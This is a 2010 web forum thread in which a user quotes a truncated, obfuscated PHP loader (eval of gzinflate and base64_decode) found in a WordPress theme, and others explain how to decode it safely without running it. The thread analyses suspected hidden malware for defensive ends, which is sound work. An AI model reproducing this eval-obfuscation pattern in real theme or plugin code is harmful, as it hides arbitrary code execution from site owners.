OM2 Posted December 5, 2010 Share Posted December 5, 2010 I have some PHP code that looks really dodgy I was given a Wordpress theme to install for someone Don't know why, I just thought I would check a few of the files before I installed on my server I've always thought it would be easy to hijack a server by using malicious code Don't know if the code would make sense, but I thought I'd give a snippet: <? eval(gzinflate(base64_decode('HJzHrutIlkV/pWaVAAf0Dmh0gd57z0mD3ouiN1/fujXNvBCpiDh7ryXq6T//+z//+Vd1ZuM/zdt96jHbq3/ybKsI7P/KqpjL6p9/iyoq98ubjUMIfuMvrLpfTH0RWnsvwTx5R6skWkXZOkZ8VFMt4SyrqsBepeNfEDwLEARxu/B82qZjv5eimjQCMMuVkLVTsEpFs6plG6TmOpRw8N5dtHAneSuOS/LdMG4U15e7wS2WQ+O/iGg228H36YdsX/dcLu/Uv3dEvU3Hak3Dz82hOsfCnEFAgcpaKFC7MfoUVSsYv5BtRtXdXAzt7WrrNvjBsNlBx1fgAohc+C2jj4DdXxoEIBwRTjNBv3ME9iM7fnV1qsv5YjX+UIn725T6GpuXmX4/yjw8mKuQxWZtmj75/ndDVKJuklU3RHIsIKWJRHKgaVdSgGByGEol6x4HB9qGNCD3YSP13MPg0FWutzew6NgFSOCs1brvSLpEyCq9iYa/Vj33vgsO0C/bHQLAHbHFqToufGTWNsUkxTu/NKbG4djdTrfd+ARSGV4uar7gm/MRaRB11/F3fa4jfhkXpw9U41ZwUwsw39zDFANHN0Kx9aVC0Jk590jUSd51KFWkWPEZ+OHEuWmNBTTeA+4jy4HcclTf24n5njFhOabzHp4m2MM+rqGSsTrxD/DmJvxF9wtAye4JSlciWwpOvhrk0gjhGy2dRCQP8TO0e0LqKqgOhZBdXm/5+ ... ... ... WRAT37W3+ldgc82VddtuetUZ7xH2clfi+VxOKhhCKsTwKyZgZP5kV13qHwxIR1aJMfgax3Ipx6qKSdsmmaQ5oL3PROPx72pA+TK81pxRxJMb4jBDYl4By4QSTHJeEuoHUiRMUnw3FuuhYUD6BTnCQWFx533VWUDCR7xqMuAL8wMMN9M6EBTiILwyZTEwk589Z5tJxEy6nM4auIJwL7TCSOIicpIz61jrcXG3imuJx3zHq/HTLpHoFbO2lu3klsZySnQ7fAhztFEFVUwxhYVgVxQ62GOkVcbxydLJgWcbJZksvjvapHb1LLcXRCnXJfbb1VTYTKxZbBvvDtLNbqlaC/ortDoOKhGkSfd5NpltjIp9f5gq/4SOT9bNXqsk118wmR/M5xO+NsIAG+Vd+WXADiysXDczyPAnG3o870gkaC3rERGuxzhWTqYfpcGuWC4Xd1qOtNnMqInNpNo1SJsf1Zk+wjBkciD/mFBiXEbac7Qx9pgFq5X09LEHyeUvsbylh8O3b8v3y/sXA//3nn3/+8z///t9///1/'))); ?> The above is just a snippet of the begining and end I won't be installing the theme on my server! What is the code though?? What can it do? Is it likely to be malicious?? Thanks OM Quote Link to comment Share on other sites More sharing options...
cigardude Posted December 6, 2010 Share Posted December 6, 2010 Save everything after base64_decode(' in to a text file. Rename the text file to .uue and open with winzip. Should decode the text file for you. Or make a new php page: $contents=(gzinflate(base64_decode('HJzHrutIlkV/pWaVAAf0Dmh0gd57z0mD3ouiN1/fujXNvBCpiDh7ryXq6T//+z//+Vd1ZuM/zdt96jHbq3/ybKsI7P/KqpjL6p9/i.........)); echo $contents; Quote Link to comment Share on other sites More sharing options...
OM2 Posted December 6, 2010 Author Share Posted December 6, 2010 hmmm ok - i can do so u think it might not be malicious code in that case? would such code actually execute and do 'something'? the actual file was about 130kb - which is huge for a php file - i would assume that would be 10000 lines of code or something? let me know what u think thanks Quote Link to comment Share on other sites More sharing options...
BlueSkyIS Posted December 6, 2010 Share Posted December 6, 2010 the code is obfuscated for one or two reasons: 1. to slightly prevent modification of the code and/or 2. it is malicious. as long as you remove the eval() from around the code, it will not execute. just like cigardude said. Quote Link to comment Share on other sites More sharing options...
OM2 Posted December 6, 2010 Author Share Posted December 6, 2010 thanks - thats great advice Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.